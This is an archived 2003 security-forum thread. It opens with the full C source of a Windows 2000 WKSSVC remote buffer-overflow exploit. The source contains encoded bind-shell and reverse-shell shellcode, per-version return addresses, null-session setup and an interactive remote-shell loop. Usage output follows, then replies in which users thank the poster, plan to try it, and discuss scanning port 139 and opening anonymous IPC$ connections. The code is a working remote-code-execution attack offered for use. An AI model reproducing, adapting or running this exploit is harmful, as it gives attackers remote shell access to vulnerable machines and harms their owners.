O_wks3.c

Full Version: O_wks3.c

GovernmentSecurity.org > The Archives > Public Downloads

101

Nov 22 2003, 09:57 PM

CODE

/*
* Author: snooq [http://www.angelfire.com/linux/snooq/]
* Date: 15 November 2003
*
* ++++++++++ THIS IS YET ANOTHER PRIVATE VERSION ++++++++++
*
* Another version........ slightly different from the one
* on packetstorm & k-otik........ =p
*
* I've changed the shellcode a bit... ExitThread() instead
* of ExitProcess()..... it doens't crash now.. :)
*
* Also, added an option for u to specify a XOR key to be
* used in encoding the payload....
*
* This should be the final release....I dun think I'm gonna
* improve this further...
*
* Lastly.. let me iterate this again....
* This code will only work against Win2K that was configured
* to grant 'anonymous logon' write access to the log file...
* [NB: win2k(on ntfs), by default, don't...]
*
* Using this against XP will likely fail....
* but if u manage to adapt this code to work for XP too..
* pleaseeeee.. send me a copy tooo.... =)
*
* +++++++++++++++++++++++++++++++++++++++++++++++++++++++++
*/
#pragma comment (linker,"/NODEFAULTLIB:msvcprtd.lib")
#pragma comment (linker,"/NODEFAULTLIB:libcmtd.lib")
#pragma comment (linker,"/NODEFAULTLIB:libcmt.lib")
#pragma comment (linker,"/NODEFAULTLIB:libcd.lib")
#pragma comment (lib,"ws2_32")
#pragma comment (lib,"msvcrt")
#pragma comment (lib,"mpr")
#pragma comment (lib,"user32")
#pragma warning (disable:4013)

#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <stdlib.h>
#include <stdio.h>
#include <lm.h>

#define NOP 0x90
#define PORT 24876
#define CODE_OFFSET 32
#define KEY_OFFSET 13
#define KEY 0x99999999

#define ALIGN 1 // Between 0 ~ 3
#define TARGET 1
#define INTERVAL 3
#define TIME_OUT 20
#define HEX_LEN 16
#define PORT_OFFSET_1 198
#define PORT_OFFSET_2 193
#define IP_OFFSET 186
#define SC_OFFSET 20 // Gap for some NOPs...
#define RET_SIZE 2026 // Big enuff to take EIP...;)

#define SC_SIZE_1 sizeof(bindport)
#define SC_SIZE_2 sizeof(connback)

#define BSIZE 2600
#define SSIZE 128

extern char getopt(int,char **,char*);
extern char *optarg;
static int alarm_fired=0;

HMODULE hMod;
FARPROC fxn;
HANDLE t1, t2;

char buff[BSIZE];

struct {
char *os;
long jmpesp;
char *dll;
}

targets[] = {
{
"Window 2000 (en) SP4",
0x77e14c29,
"user32.dll 5.0.2195.6688"
},
{
"Window 2000 (en) SP1",
0x77e3cb4c,
"user32.dll 5.0.2195.1600"
},
{
"Window 2000 (ru) SP3", // Thanks sherry for this..
0x77e2afc5,
"user32.dll 5.0.2195.4314"
},
{
"Window 2000 (ru) SP4", // Thanks 0x90 for this..
0x793bedbb,
"user32.dll 5.0.2195.6688"
},
{
"For debugging only",
0x41424344,
"dummy.dll 5.0.2195.1600"
}
}, v;

/*
* HD Moore's shellcode.....;)
* Modified to use ExitThread() instead of ExitProcess()... =p
*/

char bindport[]=
"\xeb\x19\x5e\x31\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x99\x99\x99"
"\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
"\xe8\x38\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xe5\x49\x86"
"\x49\xa4\xad\x2e\xe9\xa4\x1a\x70\xc7\xd9\x09\xf5\xad\xcb\xed\xfc"
"\x3b\x8e\x4e\x0e\xec\xef\xce\xe0\x60\xad\xd9\x05\xce\x72\xfe\xb3"
"\x16\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c\x4c\x00\x01\x5b\x54\x89"
"\xe5\x89\x5d\x00\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x58\x08\xeb\x0c\x8d\x57\x2c\x51\x52\xff\xd0\x89\xc3\x59"
"\xeb\x10\x6a\x08\x5e\x01\xee\x6a\x0a\x59\x8b\x7d\x00\x80\xf9\x06"
"\x74\xe4\x51\x53\xff\x34\x8f\xe8\x90\x00\x00\x00\x59\x89\x04\x8e"
"\xe2\xeb\x31\xff\x66\x81\xec\x90\x01\x54\x68\x01\x01\x00\x00\xff"
"\x55\x20\x57\x57\x57\x57\x47\x57\x47\x57\xff\x55\x1c\x89\xc3\x31"
"\xff\x57\x57\x68\x02\x00\x22\x11\x89\xe6\x6a\x10\x56\x53\xff\x55"
"\x18\x57\x53\xff\x55\x14\x57\x56\x53\xff\x55\x10\x89\xc2\x66\x81"
"\xec\x54\x00\x8d\x3c\x24\x31\xc0\x6a\x15\x59\xf3\xab\x89\xd7\xc6"
"\x44\x24\x10\x44\xfe\x44\x24\x3d\x89\x7c\x24\x48\x89\x7c\x24\x4c"
"\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49"
"\x51\x51\xff\x75\x00\x51\xff\x55\x30\x89\xe1\x68\xff\xff\xff\xff"
"\xff\x31\xff\x55\x2c\x57\xff\x55\x0c\xff\x55\x28\x53\x55\x56\x57"
"\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18"
"\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc"
"\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c"
"\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c"
"\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d"
"\x5b\xc2\x08\x00";

char connback[]=
"\xeb\x19\x5e\x31\xc9\x81\xe9\xab\xff\xff\xff\x81\x36\x99\x99\x99"
"\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
"\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa"
"\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\xef\xce\xe0"
"\x60\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e"
"\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64"
"\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57"
"\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a"
"\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8"
"\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90"
"\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57"
"\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68\xc0\xa8\x00\xf7\x68\x02"
"\x00\x22\x11\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44"
"\x8d\x3c\x24\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe"
"\x44\x24\x3d\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d"
"\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00"
"\x51\xff\x55\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24"
"\x57\xff\x55\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b"
"\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb"
"\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0"
"\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b"
"\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b"
"\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00";

void err_exit(char *s) {
printf("%s\n",s);
exit(0);
}

struct {
char chr;
int value;
}
CHexMap[]=
{
{'0', 0}, {'1', 1},
{'2', 2}, {'3', 3},
{'4', 4}, {'5', 5},
{'6', 6}, {'7', 7},
{'8', 8}, {'9', 9},
{'A', 10}, {'B', 11},
{'C', 12}, {'D', 13},
{'E', 14}, {'F', 15}
}, map;

/*
* This is based on code posted to codeproject
* by Anders Molin.....;)
*/

long str2long(char *s) {
long result=0;
int i, len, found, firsttime=1;

len=strlen(s);

if (*s=='0' && (*(s+1)=='X' || *(s+1)=='x')) {
s+=2;
len-=2;
}

if (len>HEX_LEN) err_exit("-> Invalid key...");

while(*s!='\0') {
found=0;
for (i=0; i<HEX_LEN; i++) {
if ((*s==CHexMap[i].chr) || (*s==CHexMap[i].chr+32)) {
if (!firsttime) result<<=4;
result |= CHexMap[i].value;
found=1;
break;
}
}
if (!found) break;
s++;
firsttime=0;
}
return result;
}

/*
* Ripped from TESO code and modifed by ey4s for win32
* and... lamer quoted it wholesale here..... =p
*/

void doshell(int sock) {
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];

time.tv_sec=1;
time.tv_usec=0;

while (1) {
ul[0]=1;
ul[1]=sock;

l=select(0,(fd_set *)&ul,NULL,NULL,&time);
if(l==1) {
l=recv(sock,buf,sizeof(buf),0);
if (l<=0) {
err_exit("-> Connection closed...");
}
l=write(1,buf,l);
if (l<=0) {
err_exit("-> Connection closed...");
}
}
else {
l=read(0,buf,sizeof(buf));
if (l<=0) {
err_exit("-> Connection closed...");
}
l=send(sock,buf,l,0);
if (l<=0) {
err_exit("-> Connection closed...");
}
}
}
}

char *getmyip(int e) {
int i;
char ac[SSIZE];
struct in_addr addr;
struct hostent *phe;

if (gethostname(ac, sizeof(ac))==SOCKET_ERROR) {
err_exit("-> Couldn't get local hostname...");
}

phe=gethostbyname(ac);

if (phe==0) {
err_exit("-> Hostname lookup error...");
}

if (e) {
for (i=0; phe->h_addr_list[i]!=0; ++i) {
memcpy(&addr, phe->h_addr_list[i], sizeof(struct in_addr));
printf("-> Use %s as local IP? [y/n]\n",inet_ntoa(addr));
if (getch()=='y' || getch()=='Y') return inet_ntoa(addr);
}
err_exit("-> Couldn't find local IP??? Try '-i' switch...\n");
}
else {
memcpy(&addr, phe->h_addr_list[0], sizeof(struct in_addr));
return inet_ntoa(addr);
}

return NULL;
}

void changeip(char *ip) {
char *ptr;
ptr=connback+IP_OFFSET;
/* Assume Little-Endianess.... */
*((long *)ptr)=inet_addr(ip);
}

void changeport(char *code, int port, int offset) {
char *ptr;
ptr=code+offset;
/* Assume Little-Endianess.... */
*ptr++=(char)((port>>8)&0xff);
*ptr++=(char)(port&0xff);
}

void banner() {
printf("\nWKSSVC Remote Exploit By Snooq [jinyean@hotmail.com]\n");
printf("\nPorted to WIN32 by class101 [class101@phreaker.net]\n\n");

}

void usage(char *s) {
banner();
printf("Usage: %s [options]\n\n",s);
printf("\t-r\tSize of 'return addresses'\n");
printf("\t-a\tAlignment size [0~3]\n");
printf("\t-p\tPort to bind shell to (in 'connecting' mode), or\n");
printf("\t\tPort for shell to connect back (in 'listening' mode)\n");
printf("\t-s\tShellcode offset from the return address\n");
printf("\t-t\tTarget types. ( -H for more info )\n");
printf("\t\tDefault is '-t 1'\n");
printf("\t-H\tShow list of possible targets\n");
printf("\t-l\tListening for shell connecting\n");
printf("\t\tback to port specified by '-p' switch\n");
printf("\t-i\tIP for shell to connect back.\n");
printf("\t\tIf '-i' is not present, the first local IP is used.\n");
printf("\t-e\tEnumerate local IPs interactively. ('listening' mode only)\n");
printf("\t-I\tTime interval between each trial ('connecting' mode only)\n");
printf("\t-T\tTime out (in number of seconds)\n");
printf("\t-k/-K\tXOR key, e.g '-k 43452352' or '-K 0xabcd9897'\n");
printf("\t-h\tTarget's IP. <<< THIS IS MANDATORY >>>\n\n");
exit(0);
}

void showtargets() {
int i;
banner();
printf("Possible targets are:\n");
printf("=====================\n");
for (i=0;i<sizeof(targets)/sizeof(v);i++) {
printf("%d) %s",i+1,targets[i].os);
printf(" --> 0x%08x (%s)\n",targets[i].jmpesp,targets[i].dll);
}
exit(0);
}

void sendstr(char *host) {

WCHAR wStr[SSIZE];
char ipc[SSIZE], hStr[SSIZE];

DWORD ret;
NETRESOURCE NET;

hMod=LoadLibrary("netapi32.dll");
fxn=GetProcAddress(hMod,"NetValidateName");

_snprintf(ipc,SSIZE-1,"\\\\%s\\ipc$",host);
_snprintf(hStr,SSIZE-1,"\\\\%s",host);
MultiByteToWideChar(CP_ACP,0,hStr,strlen(hStr)+1,wStr,sizeof(wStr)/sizeof(wStr[0]));

NET.lpLocalName = NULL;
NET.lpProvider = NULL;
NET.dwType = RESOURCETYPE_ANY;
NET.lpRemoteName = (char*)&ipc;

printf("-> Setting up $IPC session...(aka 'null session')\n");
ret=WNetAddConnection2(&NET,"","",0);

if (ret!=ERROR_SUCCESS) { err_exit("-> Couldn't establish IPC$ connection..."); }
else printf("-> IPC$ session setup successfully...\n");

printf("-> Sending exploit string...\n");

ret=fxn((LPCWSTR)wStr,buff,NULL,NULL,0);

}

VOID CALLBACK alrm_bell(HWND hwnd, UINT uMsg, UINT idEvent, DWORD dwTime ) {
err_exit("-> I give up...dude.....");
}

void setalarm(int timeout) {

MSG msg = { 0, 0, 0, 0 };
SetTimer(0, 0, (timeout*1000), (TIMERPROC)alrm_bell);

while(!alarm_fired) {
if (GetMessage(&msg, 0, 0, 0) ) {
if (msg.message == WM_TIMER) printf("-> WM_TIMER received...\n");
DispatchMessage(&msg);
}
}

}

void resetalarm() {
if (TerminateThread(t2,0)==0) {
err_exit("-> Failed to reset alarm...");
}
if (TerminateThread(t1,0)==0) {
err_exit("-> Failed to kill the 'sending' thread...");
}
}

void do_send(char *host,int timeout) {
t1=(HANDLE)_beginthread(sendstr,0,host);
if (t1==0) { err_exit("-> Failed to send exploit string..."); }
t2=(HANDLE)_beginthread(setalarm,0,timeout);
if (t2==0) { err_exit("-> Failed to set alarm clock..."); }
}

unsigned char b[4];

void get_bytes(long word) {
b[0]=word&0xff;
b[1]=(word>>8)&0xff;
b[2]=(word>>16)&0xff;
b[3]=(word>>24)&0xff;
}

void XORcode(int mode,long key) {
char *ptr, *code;
long tmp;
int i, j, len;

if (mode) {
len=SC_SIZE_2;
code=connback;
}
else {
len=SC_SIZE_1;
code=bindport;
}

printf("-> XORing payload with key -> 0x%08x....\n",key);

ptr=code+KEY_OFFSET;
*((long *)ptr)=key;
ptr=code+CODE_OFFSET;
for(i=0;i<(len-CODE_OFFSET);i+=4) {
tmp=*((long *)ptr);
*((long *)ptr)=tmp^key;
get_bytes(tmp^key);
for(j=0;j<4;j++) {
if (b[j]=='\0') err_exit("-> Payload has 'null'. Try another key..=p");
}
ptr+=4;
}
*(code+len)=0;
}

int main(int argc, char *argv[]) {

char opt;
char *host, *ptr, *ip="";
struct sockaddr_in sockadd;
int i, i_len, ok=0, mode=0, flag=0, enum_ip=0;
int align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET;
int target=TARGET, scsize=SC_SIZE_1, port=PORT;
int timeout=TIME_OUT, interval=INTERVAL;
long retaddr, key=KEY;

WSADATA wsd;
SOCKET s1, s2;

if (argc<2) { usage(argv[0]); }

while ((opt=getopt(argc,argv,"a:i:I:r:s:h:k:K:t:T:p:Hle"))!=EOF) {
switch(opt) {
case 'a':
align=atoi(optarg);
break;

case 'I':
interval=atoi(optarg);
break;

case 'T':
timeout=atoi(optarg);
break;

case 't':
target=atoi(optarg);
retaddr=targets[target-1].jmpesp;
break;

case 'i':
ip=optarg;
break;

case 'k':
key=atol(optarg);
break;

case 'K':
key=str2long(optarg);
break;

case 'l':
mode=1;
scsize=SC_SIZE_2;
break;

case 'e':
enum_ip=1;
break;

case 'r':
retsize=atoi(optarg);
break;

case 's':
sc_offset=atoi(optarg);
break;

case 'h':
ok=1;
host=optarg;
sockadd.sin_addr.s_addr=inet_addr(optarg);
break;

case 'p':
port=atoi(optarg);
break;

case 'H':
showtargets();
break;

default:
usage(argv[0]);
break;
}
}

if (!ok||((enum_ip)&&(!mode))||((enum_ip)&&(strcmp(ip,"")==0))) { usage(argv[0]); }

memset(buff,NOP,BSIZE);

ptr=buff+align;
for(i=0;i<retsize;i+=4) {
*((long *)ptr)=retaddr;
ptr+=4;
}

if (WSAStartup(MAKEWORD(1,1),&wsd)!=0) {
err_exit("-> WSAStartup error....");
}

if ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
err_exit("-> socket() error...");
}
sockadd.sin_family=AF_INET;
sockadd.sin_port=htons((SHORT)port);

ptr=buff+retsize+sc_offset;

if (BSIZE<(retsize+sc_offset+scsize)) err_exit("-> Bad 'sc_offset'..");

banner();

if (mode) {

printf("-> 'Listening' mode...( port: %d )\n",port);

if (strcmp(ip,"")==0) {
ip=getmyip(enum_ip);
if (strcmp(ip,"")==0) err_exit("-> Couldn't figure out local IP. Use '-i' switch...");
}

printf("-> Using local IP: %s\n",ip);

changeip(ip);
changeport(connback, port, PORT_OFFSET_2);
XORcode(mode,key);

for(i=0;i<scsize;i++) { *ptr++=connback[i]; }

do_send(host,timeout);
Sleep(1000);

sockadd.sin_addr.s_addr=htonl(INADDR_ANY);
i_len=sizeof(sockadd);

if (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) {
err_exit("-> bind() error...");
}

if (listen(s1,0)<0) {
err_exit("-> listen() error...");
}

printf("-> Waiting for connection...\n");

s2=accept(s1,(struct sockaddr *)&sockadd,&i_len);

if (s2<0) {
err_exit("-> accept() error...");
}

printf("-> Connection from: %s\n\n",inet_ntoa(sockadd.sin_addr));

resetalarm();
doshell(s2);

}
else {

printf("-> 'Connecting' mode...\n",port);

changeport(bindport, port, PORT_OFFSET_1);
XORcode(mode,key);
for(i=0;i<scsize;i++) { *ptr++=bindport[i]; }

do_send(host,timeout);
Sleep(1000);

printf("-> Will try connecting to shell now....\n");

i=0;
while(!flag) {
Sleep(interval*1000);
if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
printf("-> Trial #%d....\n",i++);
}
else { flag=1; }
}

printf("-> Connected to shell at %s:%d\n\n",inet_ntoa(sockadd.sin_addr),port);

resetalarm();
doshell(s1);

}

return 0;

}

NB:
-Win32 version is to use with msvcr71.dll
-Exploit is detected by some lame antivirus like Norton, "for all the ppz who dunno how work this lame antivirus"...
-I'll not reply to your questions always like , "how this work?" "how you compiled it ?" "how to scan it?" "how to ?" just dl it & shut up.

Usage:

CODE

C:\WINNT\system32>o_wks3

WKSSVC Remote Exploit By Snooq [jinyean@hotmail.com]

Ported to WIN32 by class101 [class101@phreaker.net]

Usage: o_wks3 [options]

-r Size of 'return addresses'
-a Alignment size [0~3]
-p Port to bind shell to (in 'connecting' mode), or
Port for shell to connect back (in 'listening' mode)
-s Shellcode offset from the return address
-t Target types. ( -H for more info )
Default is '-t 1'
-H Show list of possible targets
-l Listening for shell connecting
back to port specified by '-p' switch
-i IP for shell to connect back.
If '-i' is not present, the first local IP is used.
-e Enumerate local IPs interactively. ('listening' mode only)
-I Time interval between each trial ('connecting' mode only)
-T Time out (in number of seconds)
-k/-K XOR key, e.g '-k 43452352' or '-K 0xabcd9897'
-h Target's IP. <<< THIS IS MANDATORY >>>

bye

MichT

Nov 22 2003, 10:08 PM

Thx a lot man i'll test it now

ps:sorry for my english

liquidSilver

Nov 22 2003, 10:09 PM

Hmm..

Double-=V=-

Nov 22 2003, 10:11 PM

Thanks man, very sweet

haxor2k3

Nov 22 2003, 10:12 PM

Nice will have a look at this

DarkieD

Nov 22 2003, 10:40 PM

pretty old

Kynroxes

Nov 24 2003, 06:40 AM

yeah man tks a lot !!

virus

Nov 24 2003, 07:21 AM

its an html file

..... when I right click-> Save As ... it saves it as an html doc ????

101

Nov 24 2003, 11:49 AM

o_O dunno what happened, attachement wasnt working, fixed now.

teest

Dec 16 2003, 01:32 PM

I'm testing now! thx

Flinston

Dec 16 2003, 08:52 PM

that's great =)

mucho thanks for it

will test it on a german 2k3 os

let's see, don't expect it'll work

€:
huh?

---------------------------
o_wks3.exe - Komponente nicht gefunden
---------------------------
Die Anwendung konnte nicht gestartet werden, weil MSVCR71.dll nicht gefunden wurde. Neuinstallation der Anwendung könnte das Problem beheben.
---------------------------
OK
---------------------------
It says MSVCR71.dll is not present

flame

Dec 18 2003, 02:47 AM

it seems only russian sp3 and sp4 are available (considering that machines running less SPacks then that are useless)
how come only russian get to have fun
and we dont ...

..:Z:..

Dec 18 2003, 08:24 AM

sorry for my n00b question but how can i scan for this bug with a protscan "139" or how ?' thx for answers
//edit sorry for my bad english ^^

flame

Dec 18 2003, 12:10 PM

QUOTE (..:Z:.. @ Dec 18 2003, 08:24 AM)

sorry for my n00b question but how can i scan for this bug with a protscan "139" or how ?' thx for answers
//edit sorry for my bad english ^^

there are several ways to scan this exploit
1. port scan port 139 - then try connecting to ipc$ (net use \\ip\ipc$ /u:"" p:"")
2. RETINA can scan for a specific exploit.
3. you answered your own question.
4. wtf
5. see you in jail guys

Thonyx

Dec 18 2003, 01:29 PM

QUOTE

see you in jail guys

lol!!

Thx man for this sploit!

passi

Dec 18 2003, 09:13 PM

flame: nice reply

thanks for the exploit !!!

101

Dec 18 2003, 10:35 PM

QUOTE (flame @ Dec 18 2003, 02:47 AM)

it seems only russian sp3 and sp4 are available

CODE

targets[] = {
{
"Window 2000 (enGLISH) SP4",
0x77e14c29,
"user32.dll 5.0.2195.6688"
},
{
"Window 2000 (enGLISH) SP1",
0x77e3cb4c,
"user32.dll 5.0.2195.1600"

WeeDMoNKeY

Dec 19 2003, 12:09 AM

need anony login * [NB: win2k(on ntfs), by default, don't...] :< and who the (filtered) uses FAT system? noe one :< to bad, it wouldve prolly been good.

flame

Dec 19 2003, 11:59 AM

QUOTE (101 @ Dec 18 2003, 10:35 PM)

QUOTE (flame @ Dec 18 2003, 02:47 AM)

it seems only russian sp3 and sp4 are available

CODE

targets[] = {
{
"Window 2000 (enGLISH) SP4",
0x77e14c29,
"user32.dll 5.0.2195.6688"
},
{
"Window 2000 (enGLISH) SP1",
0x77e3cb4c,
"user32.dll 5.0.2195.1600"

how could i miss that ?
guess i read it 2 fast - can anyone confirm that this works ?

and weedmonkey - i read a post of someone who confirmed that this exploit (not this specific one) works on NTFS machines although it said FAT - gotta test it to be sure though.

ps. what is this XOR and how can it be changed ?

labbertasche

Dec 19 2003, 04:52 PM

thx ... let's test

ahh the dll

flame

Dec 19 2003, 05:23 PM

QUOTE (labbertasche @ Dec 19 2003, 04:52 PM)

thx ... let's test

ahh the dll

what DLL ?

passi

Dec 19 2003, 05:28 PM

you need the dll to run the exploit.

does anyone have a scanner? a GOOD one?

EXPLOiTED

Dec 21 2003, 04:48 AM

Guys... What port do I scan for to use this exploit? and what "DLL" is needed to use this?

//Edit
Nevermind... I'm guessing its port 139 judging from the prior post

101

Dec 21 2003, 11:35 AM

you should scan port 53 & port 88 kerberos of course....

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.